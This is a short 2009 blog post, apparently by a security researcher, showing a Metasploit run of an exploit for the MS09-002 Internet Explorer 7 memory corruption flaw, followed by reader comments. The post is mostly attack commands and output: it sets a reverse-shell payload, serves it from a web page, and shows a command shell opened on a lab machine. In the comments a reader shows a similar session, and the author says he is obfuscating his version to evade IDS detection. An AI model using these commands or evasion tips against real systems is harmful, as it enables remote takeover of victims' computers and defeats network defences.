Wednesday, February 18, 2009

MS09_002 Memory Corruption Exploit

Details to follow. :-)

msf > use exploit/windows/browser/ms09_002
msf exploit(ms09_002) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms09_002) > set LPORT 1701
LPORT => 1701
msf exploit(ms09_002) > set LHOST 10.10.10.15
LHOST => 10.10.10.15
msf exploit(ms09_002) > set URIPATH ie7.html
URIPATH => ie7.html
msf exploit(ms09_002) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms09_002) > exploit
[*] Exploit running as background job.
msf exploit(ms09_002) >
[*] Handler binding to LHOST 10.10.10.15
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/ie7.html
[*] Local IP: http://10.10.10.15:80/ie7.html
[*] Server started.
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 10.10.10.1:1865...
[*] Command shell session 1 opened (10.10.10.15:1701 -> 10.10.10.1:4387)

6 comments:

  1. Hmmmm... sounds great!! Can't wait for the juicy details ;)

  2. Install Linux, problem solved.

  3. got mine!

    msf exploit(ms09_002) > sessions -l -v

    Active sessions
    ===============

    Id  Description    Tunnel                                   Via
    --  -----------    ------                                   ---
    1   Command shell  172.10.1.100:1975 -> 172.10.1.104:1116   windows/browser/ms09_002

    msf exploit(ms09_002) >

    ...thanks for the sample malware, Dean!!

  4. No worries. Happy to help. :) I just need to finish off the obfuscation of the variables in mine and it's done.

    I tested it through ISS's IDS and it's catching the shellcode and NOPs right now, and not the trigger itself, although that does not seem easy to alert on.

  5. w00t! I didn't get mine! :(
